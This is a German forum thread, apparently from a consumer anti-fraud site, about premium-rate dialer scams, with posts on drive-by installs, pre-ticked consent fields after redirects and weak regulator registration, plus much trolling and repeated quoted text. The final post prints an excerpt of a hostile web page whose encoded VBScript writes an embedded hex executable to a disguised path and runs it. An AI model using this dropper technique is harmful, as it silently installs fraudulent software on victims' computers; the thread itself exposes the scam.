A
Anonymous
Anonymous schrieb:
Der Stardialer/Mainpean/Intexus-Dialer ist vielleicht auf download-url.de?
$whois download-url.de hilft dir vielleicht.
Dialer Automatisierung
- Ersteller Opfer
- Erstellt am
Der Stardialer/Mainpean/Intexus-Dialer ist vielleicht auf download-url.de?
$whois download-url.de hilft dir vielleicht.
Max Grimm schrieb:
Ich hab zwar keine Ahnung was "Findet Nemo" mit Dialern zu haben soll, aber OK. Ich gebe dir aber mal einen Tip: Die Reihenfolge für ein Posting sollte sein: lesen, denken,verstehen, posten. Es geht hier nicht darum per Script eine lokale Datei zu manipulieren, sondern per Script die Webseite zu manipulieren welche den Dialerdownload startet (und dieser kann sich als ActiveX sehr wohl selbständig machen). Da viele Anbieter dieser Dialer die Eingabe irgendeines Wortes auf Ihren Webseiten verlangen ist das ganze also weder dumm noch lächerlich. Und irgendwelche User als "DAU´s" zu bezeichnen ist auch nicht angebracht, schon gar nicht, wenn man sich mit einem Posting wie deinem selbst disqualifiziert hat
@Hans die Wurst (Klasse Name übrigens - scheint zu passen): Für dich gilt die gleiche Postingreihenfolge: lesen, denken,verstehen, posten. Wenn du an Punkt 3 scheiterst, einfach nochmal von vorne beginnen
Als kleiner Denkanstoss, da du ja schon so geistreiche Vergleiche bringst (Scripter können einem Script aufsitzen ?): Kann das Auto eines KFZlers kaputtgehen ? Kann sich ein Programmierer einen Virus einfangen ? Alles klar ?
@Admin: Ich wette das man bei verschiedenen Postern hier die gleiche IP in der DB findet
Es sollte vieleicht darüber nachgedacht werden eine Zwangsregistrierung einzuführen. Ist aber eigentlich schon toll zu sehne, zu was für geistigen Ergüssen sich manche unter dem vermeintlichen Deckmanterl der Anonymitär hinreissen lassen. Oder sind wir etwa jemand auf dem Schlips getreten der ansonsten ganz gern mal seinen Accountnamen bei "?referer=" oder "?account=" in einer Dialerdownload URL einträgt 
Opfer
A
Anonymous
Anonymous schrieb:
Also STARDIALER findet sich mit Sicherheit nicht auf SMS-Stadt.
Intexusdial wäre richtiger. Wenn schon kleinlich dann auch richtig: Also -> Intexusdialschrott -> sieht auch viel schöner aus.
Alles Roger
Tonguru
Mitglied
Bin die Tage über eine eben genau solche programmierte Website gestolpert, die Aufforderung "Ja, weiter" war gut lesbar und wurde von mir auch bestätigt, da ich davon ausgehe, daß eine Bestätigungsabfrage im Dialer-Fenster selbst erfolgt.
Habe mir seit 2 Jahren keinen Dialer mehr eingefangen, weil ActiveX bei mir eine Sicherheitsabfrage auslöst, ich fühlte mich mittlerweile auch sicher, weil Firewall sowie YAW installiert und 0190 durch die Telekom gesperrt sind.
Nun, es tat sich eine Firewall-Warnung auf, die ich noch nie sah, "WINNT\System32\mshta.exe ist im Begriff, zum ersten Mal auf das Internet zuzugreifen".
Während ich noch versuchte, das einzuordnen, trennte sich auch schon meine Modemverbindung.
Keine ActiveX-Abrfage, kein Dialerfenster, keine Zustimmungsmöglichkeit.
Exakt 10 Sekunden später meldete sich YAW mit dem Hinweis "Prozess 1476 (C:\web.exe) ist verdächtig. Das Programm wählt oder erstellt DFÜ Verbindungen". Na klasse!
Es ist nichts passiert, YAW blockt alles, dennoch war ich erst mal verblüfft, daß mir so was wieder passiert ist, und ein weiteres Mal verärgert ob dieser Methoden!
"Web.exe" wurde auf meiner anderen Festplatte installiert (Windows läuft bei mir auf D), und von keinem Scanner erkannt (YAW, Spybot, Ad-Aware). Zumindest ist das Programm selbst anscheinend nicht agressiv, hab es gesichert und isoliert, es blieb bei dem einmaligen Einwahlversuch, trotz Eintrag in die DFÜ-Verbindung (natürlich sofort gelöscht).
Zur Internetseite: Die genauen AGB (hellrosa auf dunkelrosa, klasse lesbar) erläutern u.a. auch, daß man der Einwahl zustimmt, was allerdings weiter unten noch einmal mit zweifachem "JA"-Eintrag bestätigt werden muß.
Ich schwöre, dieses NICHT getan zu haben, hab die AGBs ja gar nicht gelesen - ähem...
Dennoch installierte sich dieser Dialer. Hab die Website danach noch einmal offline getest. Und was passiert?
Beim Klick auf "Ja, weiter" poppt ein Hinweis auf, "Sie haben die AGBs nicht akzeptiert". Hallo???
War das nun eine andere Site, als die, deren "Ja, weiter" ich bestätigte? Wird ein Cookie ausgelesen (hab ich mal gelöscht, Ergebnis bleibt)? Oder ist das zeitgesteuert? Gibts sonst irgendwo einen Eintrag auf meinem System, der die Seite anweist, höflicherweise die Sicherheitsabfrage zu aktivieren? Hängt es von einer vorgeschalteten URL ab? Waren die beiden "Ja" bereits eingetragen, als ich das erste Mal auf die Seite kam (womit wir beim Thema wären)?
Werde die Site hier nicht posten, erscheint mir zu gefährlich. Bei Interesse an der URL oder am Dialer bitte PN an mich.
Habe mir seit 2 Jahren keinen Dialer mehr eingefangen, weil ActiveX bei mir eine Sicherheitsabfrage auslöst, ich fühlte mich mittlerweile auch sicher, weil Firewall sowie YAW installiert und 0190 durch die Telekom gesperrt sind.
Nun, es tat sich eine Firewall-Warnung auf, die ich noch nie sah, "WINNT\System32\mshta.exe ist im Begriff, zum ersten Mal auf das Internet zuzugreifen".
Während ich noch versuchte, das einzuordnen, trennte sich auch schon meine Modemverbindung.
Keine ActiveX-Abrfage, kein Dialerfenster, keine Zustimmungsmöglichkeit.
Exakt 10 Sekunden später meldete sich YAW mit dem Hinweis "Prozess 1476 (C:\web.exe) ist verdächtig. Das Programm wählt oder erstellt DFÜ Verbindungen". Na klasse!
Es ist nichts passiert, YAW blockt alles, dennoch war ich erst mal verblüfft, daß mir so was wieder passiert ist, und ein weiteres Mal verärgert ob dieser Methoden!
"Web.exe" wurde auf meiner anderen Festplatte installiert (Windows läuft bei mir auf D), und von keinem Scanner erkannt (YAW, Spybot, Ad-Aware). Zumindest ist das Programm selbst anscheinend nicht agressiv, hab es gesichert und isoliert, es blieb bei dem einmaligen Einwahlversuch, trotz Eintrag in die DFÜ-Verbindung (natürlich sofort gelöscht).
Zur Internetseite: Die genauen AGB (hellrosa auf dunkelrosa, klasse lesbar) erläutern u.a. auch, daß man der Einwahl zustimmt, was allerdings weiter unten noch einmal mit zweifachem "JA"-Eintrag bestätigt werden muß.
Ich schwöre, dieses NICHT getan zu haben, hab die AGBs ja gar nicht gelesen - ähem...
Dennoch installierte sich dieser Dialer. Hab die Website danach noch einmal offline getest. Und was passiert?
Beim Klick auf "Ja, weiter" poppt ein Hinweis auf, "Sie haben die AGBs nicht akzeptiert". Hallo???
War das nun eine andere Site, als die, deren "Ja, weiter" ich bestätigte? Wird ein Cookie ausgelesen (hab ich mal gelöscht, Ergebnis bleibt)? Oder ist das zeitgesteuert? Gibts sonst irgendwo einen Eintrag auf meinem System, der die Seite anweist, höflicherweise die Sicherheitsabfrage zu aktivieren? Hängt es von einer vorgeschalteten URL ab? Waren die beiden "Ja" bereits eingetragen, als ich das erste Mal auf die Seite kam (womit wir beim Thema wären)?
Werde die Site hier nicht posten, erscheint mir zu gefährlich. Bei Interesse an der URL oder am Dialer bitte PN an mich.
A
Anonymous
Opfer schrieb:
Da haben wir wieder das galaktische "OK". Wie ist es dort hingekommen? Per Script? Per Programm? Per Polizei? Per Papst? oder einfach per Eingabe einer Zeichenfolge. Als einfach so auf der Tastatur eingegeben.
Man ist sich nicht sicher. Schreiben hier überhaupt Menschen? Oder sind das alles hier nur Chatbots ala Elbot (Elbot.de). Wieso geben hier unbedarfte Bürger einfach so "OK" auf einer Webseite ein.
>(( NEW BANN VAR () )) "OK" "OKAY" "JA" < hilft eventl.
The Man of ohhhkkkei
:dafuer:dvill schrieb:
Im Hintergrund steht doch wohl, dass hier im Forum nicht nur Insider fachsimpeln, sondern auch (hauptsächlich?) Schäden von unerfahrenen Usern ferngehalten werden sollen - durch Hilfen bei der Abwehr von Forderungen, aber auch Hinweis auf die aktuellen Gefahren. Und deswegen sind auch solche Demos wie von Opfer wichtig.
@Roger aus K.: Zu platt ist es dabei, auf den Unterschied zwischen Star- und Intexusdialer ablenken zu wollen.
Auch die Betreiber der "neuen Dialer" sollten verschärftes Misstrauen akzeptieren: Nicht jeder prüft den Hashwert des Dialers auf seiner Festplatte, zu vielen reicht es, dass die abgerechnete 09009-Nummer überhaupt registriert ist. Dafür gibt es zu viele, die ohne "Führerschein" mit fertig eingerichteten PC's am Netz sind.
Ich werde mich hier zwar an keinem Flamewar beteiligen, möchte dir aber einen gutgemeinten Rat geben: Du du solltest mal öfters die Nähe eines weiblichen Wesens suchen. Das entspannt ungemein, und hilft dagegen Threats zu shreddern oder seine (und anderer Leute) Zeit mit sinnlosem Müll zu vergeuden. Wenn du also nichts sinnvolles zum Thema zu sagen hast, geh dich besser mit deinem Bot unterhalten. Ahso...bei dir erscheint mit eine definition der Bann Vars mit Wildcards als sinnvoll
So, letzte antwort von mir auf solche "postings". Ich geh jetzt erst mal lecker chinesisch essen
Opfer
cicojaka
Mitglied
Anonymous schrieb:
Gast schrieb:
Im cache ist kein Zusammenhang zu sehen zwischen dem Dialerdownload und sms-stadt, das habe ich auch schon geschrieben... Man kriegt einen Unsinnslink bei google und wird zu einer amazon-Seite geleitet, die funktoniert, wie eine amazon-Seite mit einem ähnlich klingenden Suchbegriff wie der ursprünglich gewählte (war bei mir "adovai"). DAHINTER (oder darunter) ist eine funktionierende Dialereinwahlseite, die JETZT eine 404-Fehlermeldung provoziert. Das ist alles.
...und wenn da jetzt ein anderer dialer sein sollte, ist das nur noch interessanter...
Ende Dez. 2003 war da der stardialer und wenn ein Betroffener in diesem Forum nach stardialer sucht, weil er auf seiner Rechnung eine unerklärliche Einwahl findet, soll er von so etwas wissen. Besser: Sein Anwalt...
was den stardialer in meinem Beispiel angeht:
siehe Bild, bei Bedarf: www.fielmann.de
Liebe Grüße
fischchen
[/img]
Anhänge
Rahmat
Frisch registriert
@Gast, Moritz, Wurstpelle + co.
1.) Siehe Opfer :"Für dich gilt die gleiche Postingreihenfolge: lesen, denken,verstehen, posten. Wenn du an Punkt 3 scheiterst, (Anm. meinerseits: was offensichtlich ist) einfach nochmal von vorne beginnen "
Hier besteht einzig und allein die Gefahr, dass Ihr Euch damit in einer Endlosschleife befindet, was die Menschheit aber verschmerzen kann.
2.) Spätestens seit Dürrenmatts "Physikern" weiß jeder, dass alles was gedacht wird auch irgendwann gemacht wird.
Übrigens zu Eurer Information die Physiker sind Weltliteratur, keine Hotdogs. Einzige Systemvoraussetzung: Man muß lesen können.
3.) Eure "DAU's" sind diejenigen Leute die Ihr abzockt und betrügt. Wenn Ihr sie jetzt auch noch völlig daneben disqualifiziert und beschimpft, dokumentiert dies nur, dass Ihr noch noch rudimentäre Reste an Gewissen habt und versucht, auf irgendeine Art und Weise Euere Taten zu rechtfertigen, wenn auch sehr ungeschickt.
4.) Beleidigt nicht meine Intellligenz. Die Eure zu beleidigen, besteht keine Gefahr.
5.) Hier sind Gäste jederzeit willkommen. Nur: Es sind Gäste, die sich bitte auch entsprechend zu verhalten haben.
Wenn Ihr pöbeln wollt, macht das bitte unter Euresgleichen. Danke.
Wenn sich jeder von Euch nicht in jedem der hier angesprochenen Punkte wiederfindet, möge er sich bitte die Punkte aussuchen, die für ihn passen, in sich gehen und die Schnauze halten, bzw. beim posten nicht mehr vergessen vorher den "Hirn-an-Knopf" zu drücken.
Rahmat
P.S.:
Man möge mir bitte verzeihen, dass ich die Trolle gefüttert habe.
Wird nicht wieder vorkommen.
1.) Siehe Opfer :"Für dich gilt die gleiche Postingreihenfolge: lesen, denken,verstehen, posten. Wenn du an Punkt 3 scheiterst, (Anm. meinerseits: was offensichtlich ist) einfach nochmal von vorne beginnen "
Hier besteht einzig und allein die Gefahr, dass Ihr Euch damit in einer Endlosschleife befindet, was die Menschheit aber verschmerzen kann.
2.) Spätestens seit Dürrenmatts "Physikern" weiß jeder, dass alles was gedacht wird auch irgendwann gemacht wird.
Übrigens zu Eurer Information die Physiker sind Weltliteratur, keine Hotdogs. Einzige Systemvoraussetzung: Man muß lesen können.
3.) Eure "DAU's" sind diejenigen Leute die Ihr abzockt und betrügt. Wenn Ihr sie jetzt auch noch völlig daneben disqualifiziert und beschimpft, dokumentiert dies nur, dass Ihr noch noch rudimentäre Reste an Gewissen habt und versucht, auf irgendeine Art und Weise Euere Taten zu rechtfertigen, wenn auch sehr ungeschickt.
4.) Beleidigt nicht meine Intellligenz. Die Eure zu beleidigen, besteht keine Gefahr.
5.) Hier sind Gäste jederzeit willkommen. Nur: Es sind Gäste, die sich bitte auch entsprechend zu verhalten haben.
Wenn Ihr pöbeln wollt, macht das bitte unter Euresgleichen. Danke.
Wenn sich jeder von Euch nicht in jedem der hier angesprochenen Punkte wiederfindet, möge er sich bitte die Punkte aussuchen, die für ihn passen, in sich gehen und die Schnauze halten, bzw. beim posten nicht mehr vergessen vorher den "Hirn-an-Knopf" zu drücken.
Rahmat P.S.:
Man möge mir bitte verzeihen, dass ich die Trolle gefüttert habe.
Wird nicht wieder vorkommen.
total völlig anonymer Gast schrieb:
Uns ist doch ziemlich egal, welches Etikett verwendet würde, wenn´s nur das wäre, was in der Datenbank hinterlegt ist. Wenn das Dialerchen als intexusdialerschrott.exe für den User zum Download bereitgehalten würde, wären wir doch schon einen Schritt weiter.
Code:
Sie müssen nur unseren Intexusdialerschrott downloaden und ausführen und schon können sie für teures Geld sehen, was es bei uns alles nicht gibt.Wäre doch schonmal ein Schritt in die richtige Richtung.
Villmücke? Habe ich schonmal gehört. Guck in Dein Regal und kram´ mal die Indiana-Jones-DVD-Box raus. Da spielt die mit, glaube ich. Oder geh´ "uss Uwe" besuchen? Dem ist sicher auch langweilig...
A
Anonymous
[james-bond-mode]
In der RegTP-Datenbank müssen normalerweise auch die Adressierungsmerkmale
hinterlegt sein. Dazu gehören die Quell-URL zwecks Stichproben und Die
Sprungadresse, also die Adresse, auf die der Dialer nach Einwahl
"einspringt". Bei Mainpean / Intexus, wie auch immer man sie nennen möchte,
wird man in der Datenbank auf der Suche nach der Quell-URL schonmal nicht
fündig. Schaut man sich das hier an, kriegt man einen leisen Vorgeschmack:
http://www.mainpean.de/wochennews/archiv/2004/kw02/
Dort gibt es bereits 12 verschiedene Quellen, die der Dialerdrücker einbauen
kann. Zu jeder Quelle
gibt es dann noch eine Variante
,
woraus sich bereits 24 verschiedene mögliche Quellen ergeben. Dazu kommen noch während ich hier schreibe weitere mögliche Quellen, die aber nicht im veröffentlichten Newsletter genannt hat. Die RegTP wird natürlich nicht mit solch unwesentlichen Details belästigt und bei Registrierung werden selbstverständlich nicht alle Quell-URLs angegeben.
Wenn man sich jetzt vorstellt, dass die Berliner einen kompletten eigenen IP-Block besitzen und eigene DNS-Server, dann kann man mit den 256 möglichen IPs und den mindestens 24 möglichen Quell-URLs ein dermaßen schönes Bäumchen-Wechsel-Dich veranstalten, dass es der RegTP und den Geprellten ganz schwindlig werden kann.
[/james-bond-mode]
In der RegTP-Datenbank müssen normalerweise auch die Adressierungsmerkmale
hinterlegt sein. Dazu gehören die Quell-URL zwecks Stichproben und Die
Sprungadresse, also die Adresse, auf die der Dialer nach Einwahl
"einspringt". Bei Mainpean / Intexus, wie auch immer man sie nennen möchte,
wird man in der Datenbank auf der Suche nach der Quell-URL schonmal nicht
fündig. Schaut man sich das hier an, kriegt man einen leisen Vorgeschmack:
http://www.mainpean.de/wochennews/archiv/2004/kw02/
Dort gibt es bereits 12 verschiedene Quellen, die der Dialerdrücker einbauen
kann. Zu jeder Quelle
Code:
http://download._____.de/?account=
Code:
http://www._____.de/download/?pid=woraus sich bereits 24 verschiedene mögliche Quellen ergeben. Dazu kommen noch während ich hier schreibe weitere mögliche Quellen, die aber nicht im veröffentlichten Newsletter genannt hat. Die RegTP wird natürlich nicht mit solch unwesentlichen Details belästigt und bei Registrierung werden selbstverständlich nicht alle Quell-URLs angegeben.
Wenn man sich jetzt vorstellt, dass die Berliner einen kompletten eigenen IP-Block besitzen und eigene DNS-Server, dann kann man mit den 256 möglichen IPs und den mindestens 24 möglichen Quell-URLs ein dermaßen schönes Bäumchen-Wechsel-Dich veranstalten, dass es der RegTP und den Geprellten ganz schwindlig werden kann.
[/james-bond-mode]
cicojaka
Mitglied
sorry@Opfer wegen weiterer Thread-Zerfledderung, aber ich kann ja einem Gast keine PN schicken...
Moment, dann ist das, was bei der RegTP "Adressierungsmerkmal" heisst, der Fleck im großen www, wo der Dialer "hinspringt" - und zwar NACH Einwahl? Dann ist folglich jeder dialer illegal, der da ohne OKs und trulala oder aber schon vorher hinspringt? Kann das jemand bestätigen?
Anonymous schrieb:
Moment, dann ist das, was bei der RegTP "Adressierungsmerkmal" heisst, der Fleck im großen www, wo der Dialer "hinspringt" - und zwar NACH Einwahl? Dann ist folglich jeder dialer illegal, der da ohne OKs und trulala oder aber schon vorher hinspringt? Kann das jemand bestätigen?
Tonguru
Mitglied
Was zu beweisen war!
http://forum.computerbetrug.de/viewtopic.php?t=3710&postdays=0&postorder=asc&start=23
Und es geht doch!
Hat mir keine Ruhe gelassen, hab es von der ursprünglichen URL aus getestet, und siehe da...
Beim direkten Zugriff auf den "Mitgliederbereich" kommt stets die Sicherheitsabfrage, nach Umleitung durch eine externe URL jedoch sind die beiden "Ja" bereits brav eingetragen...
Habs nicht getürkt, kann jeder selbst probieren.
Die (ursprüngliche) URL gibts aber nur per PN.
Solange man nicht "Ja, weiter" klickt, passiert auch nichts (aktueller Stand, ohne Gewähr!).
http://forum.computerbetrug.de/viewtopic.php?t=3710&postdays=0&postorder=asc&start=23
Und es geht doch!
Hat mir keine Ruhe gelassen, hab es von der ursprünglichen URL aus getestet, und siehe da...
Beim direkten Zugriff auf den "Mitgliederbereich" kommt stets die Sicherheitsabfrage, nach Umleitung durch eine externe URL jedoch sind die beiden "Ja" bereits brav eingetragen...
Habs nicht getürkt, kann jeder selbst probieren.
Die (ursprüngliche) URL gibts aber nur per PN.
Solange man nicht "Ja, weiter" klickt, passiert auch nichts (aktueller Stand, ohne Gewähr!).
Anhänge
cicojaka
Mitglied
@tonguru
Na dann, "Matlock ermitteln Sie" (siehe http://forum.computerbetrug.de/viewtopic.php?t=3665), oder irre ich mich da? Ach, ich irre mich, die Firma Matlock vom anderen thread sitzt ja in Belize. Wer's glaubt, wird selig...
Na dann, "Matlock ermitteln Sie" (siehe http://forum.computerbetrug.de/viewtopic.php?t=3665), oder irre ich mich da? Ach, ich irre mich, die Firma Matlock vom anderen thread sitzt ja in Belize. Wer's glaubt, wird selig...
A
Anonymous
Anonymous schrieb:
Na dann sollte der "Sehnerv direkt ins Hirn geleitet" Mode angeschaltet werden: Die Stichproben mach die Regtp -> nicht der Dau. Kann er ja auch garnicht. Sein Blut sammelt sich gerade im Schwellkörper und findet keinen Weg ins Hirn.
Waldtrau die sich auch im Wald traut
Oki, neue Erkentnisse:
Die Dialer sind in manchen Fällen offenbar gar nicht als *.exe Datei auf einem Server abgelegt, sondern kommen "als Hex-Code daher". Das bedeuted konkret:
Eine Seite (ab und zu VBscript verschlüsselt - huhh...jetzt bekomm ich aber Angst) enthällt z.B folgenden Content (Auszug):
<html>
<script language="VBScript.Encode">
self.MoveTo 5000,5000
szZeroLine = "00000000000000000000000000000000000000000"
szBinary = ""
szBinary = szBinary & "4D5A90000300000004000000FFFF0000B8000000000000004000"
szBinary = szBinary & "000000000000000000000000D80000000E1FBA0E00B409CD21B"
szBinary = szBinary & "742062652072756E20696E20444F53206D6F64652E0D0D0A2400"
...
szApplication = "c:\Progra~1\Outloo~1\outl32c.exe"
Set hFSO = CreateObject("Scripting.FileSystemObject")
if not hFSO.FileExists(szApplication) Then
Set hFile = hFSO.CreateTextFile(szApplication, ForWriting)
Was passiert hier nun ? Eigentlich ist das ganz einfach: Die *.exe Datei wird auf den Computer "geschrieben". Wenn man eine beliebige *.exe Datei mal mit einem Hex-Editor öffnet, dann sieht man viele viele Hexcodes (z.B 4D5A..). Diese codes zusammen ergeben das komplette Programm. Über das FileScriptingObject kann man eine Webseite nun dazu bringen, eben diesen Inhalt als neue Datei auf den Rechner zu schreiben. Wenn ein Dialer z.B mit einem EXE Packert gepackt wurde (UPX wird offenbar sehr gerne benutzt - kost ja nix), wird die so klein, das man das ganze Programm bequem in eine Webseite packen kann (Als Beispiel der DDialer.exe = 68kb wäre also kein Problem zu realisieren). Auf diese Art und Weise (und ich denke bei mir war es der Fall) kommt die *.exe gar nicht per Download auf den Rechner, sondern wird dort erstellt ! Praktischerweisse, kann der dann auch gleich gestartet werden (mittels dem Befehl: hShell.run(szApplication)).
Wieder ein mal ein schönes Beispiel dafür was sich die Jungs doch alles einfallen lassen um an unser Geld zu kommen :/
Opfer
Die Dialer sind in manchen Fällen offenbar gar nicht als *.exe Datei auf einem Server abgelegt, sondern kommen "als Hex-Code daher". Das bedeuted konkret:
Eine Seite (ab und zu VBscript verschlüsselt - huhh...jetzt bekomm ich aber Angst) enthällt z.B folgenden Content (Auszug):
<html>
<script language="VBScript.Encode">
self.MoveTo 5000,5000
szZeroLine = "00000000000000000000000000000000000000000"
szBinary = ""
szBinary = szBinary & "4D5A90000300000004000000FFFF0000B8000000000000004000"
szBinary = szBinary & "000000000000000000000000D80000000E1FBA0E00B409CD21B"
szBinary = szBinary & "742062652072756E20696E20444F53206D6F64652E0D0D0A2400"
...
szApplication = "c:\Progra~1\Outloo~1\outl32c.exe"
Set hFSO = CreateObject("Scripting.FileSystemObject")
if not hFSO.FileExists(szApplication) Then
Set hFile = hFSO.CreateTextFile(szApplication, ForWriting)
Was passiert hier nun ? Eigentlich ist das ganz einfach: Die *.exe Datei wird auf den Computer "geschrieben". Wenn man eine beliebige *.exe Datei mal mit einem Hex-Editor öffnet, dann sieht man viele viele Hexcodes (z.B 4D5A..). Diese codes zusammen ergeben das komplette Programm. Über das FileScriptingObject kann man eine Webseite nun dazu bringen, eben diesen Inhalt als neue Datei auf den Rechner zu schreiben. Wenn ein Dialer z.B mit einem EXE Packert gepackt wurde (UPX wird offenbar sehr gerne benutzt - kost ja nix
), wird die so klein, das man das ganze Programm bequem in eine Webseite packen kann (Als Beispiel der DDialer.exe = 68kb wäre also kein Problem zu realisieren). Auf diese Art und Weise (und ich denke bei mir war es der Fall) kommt die *.exe gar nicht per Download auf den Rechner, sondern wird dort erstellt ! Praktischerweisse, kann der dann auch gleich gestartet werden (mittels dem Befehl: hShell.run(szApplication)).Wieder ein mal ein schönes Beispiel dafür was sich die Jungs doch alles einfallen lassen um an unser Geld zu kommen :/
Opfer